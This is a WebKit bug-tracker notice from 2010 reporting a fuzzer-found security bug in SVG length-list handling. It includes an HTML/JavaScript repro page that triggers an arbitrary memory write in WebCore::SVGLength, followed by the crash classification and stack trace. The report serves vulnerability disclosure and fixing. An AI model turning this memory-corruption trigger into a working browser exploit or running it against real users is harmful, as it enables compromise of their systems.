[Webkit-unassigned] [Bug 48831] New: chrome.dll!WebCore::SVGLength::SVGLength WriteAV at Arbitrary (ab566cfad36b72d82883e59d51a1dbec)

bugzilla-daemon at webkit.org
Tue Nov 2 06:21:04 PDT 2010


https://bugs.webkit.org/show_bug.cgi?id=48831

           Summary: chrome.dll!WebCore::SVGLength::SVGLength
                    WriteAV at Arbitrary (ab566cfad36b72d82883e59d51a1dbec)
           Product: WebKit
           Version: 528+ (Nightly build)
          Platform: PC
               URL: http://code.google.com/p/chromium/issues/detail?id=61576
        OS/Version: Windows Vista
            Status: NEW
          Severity: Normal
          Priority: P1
         Component: SVG
        AssignedTo: webkit-unassigned at lists.webkit.org
        ReportedBy: skylined at chromium.org
                CC: eric at webkit.org, zimmermann at kde.org,
                    mdelaney at apple.com


Created an attachment (id=72656)
 --> (https://bugs.webkit.org/attachment.cgi?id=72656&action=review)
Repro

Repro:
<html><head><script>
  function go() {
    var oSVGAltGlyphElement = window.document.createElementNS("http://www.w3.org/2000/svg", "altGlyph");
    var oSvgMaskElement = document.createElementNS("http://www.w3.org/2000/svg","mask");
    var oSvgLengthList = oSVGAltGlyphElement.dy.baseVal;
    oSvgLengthList.appendItem(oSvgMaskElement.width.animVal);
    gc();
    oSvgLengthList.appendItem(oSvgMaskElement.width.animVal);
    gc();
    oSvgLengthList.removeItem(0);
    gc();
    oSvgLengthList.appendItem(oSvgMaskElement.width.animVal);
    gc();
    location.reload();
  }
</script></head><body onload="go();"></body></html>

May not be exploitable; my fuzzer found a number of read and write AVs while trying to reduce the issue but they were mostly NULL pointers, except for the ReadAV below. It's not immediately obvious to me what is causing this.

id:             chrome.dll!WebCore::SVGLength::SVGLength WriteAV at Arbitrary (ab566cfad36b72d82883e59d51a1dbec)
description:    Security: Attempt to write to arbitrary memory @ 0x00D60000 in chrome.dll!WebCore::SVGLength::SVGLength
note:           Based on this information, this is expected to be a security issue!
application:    Chromium 9.0.571.0
stack:          chrome.dll!WebCore::SVGLength::SVGLength
                chrome.dll!WTF::VectorCopier<...>::uninitializedCopy
                chrome.dll!WTF::VectorMover<...>::moveOverlapping
                chrome.dll!WebCore::SVGListPropertyTearOff<...>::removeItemFromList
                chrome.dll!WebCore::SVGAnimatedListPropertyTearOff<...>::removeItemFromList
                chrome.dll!WebCore::SVGListPropertyTearOff<...>::appendItem
                chrome.dll!WebCore::SVGLengthListInternal::appendItemCallback
                chrome.dll!v8::internal::HandleApiCallHelper<...>
                chrome.dll!v8::internal::Builtin_HandleApiCall
                chrome.dll!v8::internal::Invoke
                chrome.dll!v8::internal::Execution::Call
                chrome.dll!v8::Function::Call
                chrome.dll!WebCore::V8Proxy::callFunction
                chrome.dll!WebCore::V8LazyEventListener::callListenerFunction
                chrome.dll!WebCore::V8AbstractEventListener::invokeEventHandler
                chrome.dll!WebCore::V8AbstractEventListener::handleEvent
                chrome.dll!WebCore::EventTarget::fireEventListeners
                chrome.dll!WebCore::EventTarget::fireEventListeners
                chrome.dll!WebCore::DOMWindow::dispatchEvent
                chrome.dll!WebCore::DOMWindow::dispatchLoadEvent
                chrome.dll!WebCore::Document::implicitClose
                chrome.dll!WebCore::FrameLoader::checkCompleted
                chrome.dll!WebCore::FrameLoader::finishedParsing
                chrome.dll!WebCore::Document::finishedParsing
                chrome.dll!WebCore::HTMLDocumentParser::prepareToStopParsing
                chrome.dll!WebCore::DocumentWriter::endIfNotLoadingMainResource
                chrome.dll!WebCore::FrameLoader::finishedLoading
                chrome.dll!WebCore::MainResourceLoader::didFinishLoading
                chrome.dll!WebCore::ResourceLoader::didFinishLoading
                chrome.dll!WebCore::ResourceHandleInternal::didFinishLoading
                chrome.dll!webkit_glue::WebURLLoaderImpl::Context::OnCompletedRequest
                chrome.dll!ResourceDispatcher::OnRequestComplete
                chrome.dll!IPC::MessageWithTuple<...>::Dispatch<ResourceDispatcher,void 
                chrome.dll!ResourceDispatcher::DispatchMessageW
                chrome.dll!ResourceDispatcher::OnMessageReceived
                chrome.dll!ChildThread::OnMessageReceived
                chrome.dll!RunnableMethod<...>,void 
                chrome.dll!MessageLoop::RunTask
                chrome.dll!MessageLoop::DoWork
                chrome.dll!base::MessagePumpDefault::Run
                chrome.dll!MessageLoop::RunInternal
                chrome.dll!MessageLoop::Run
                chrome.dll!RendererMain
                ...
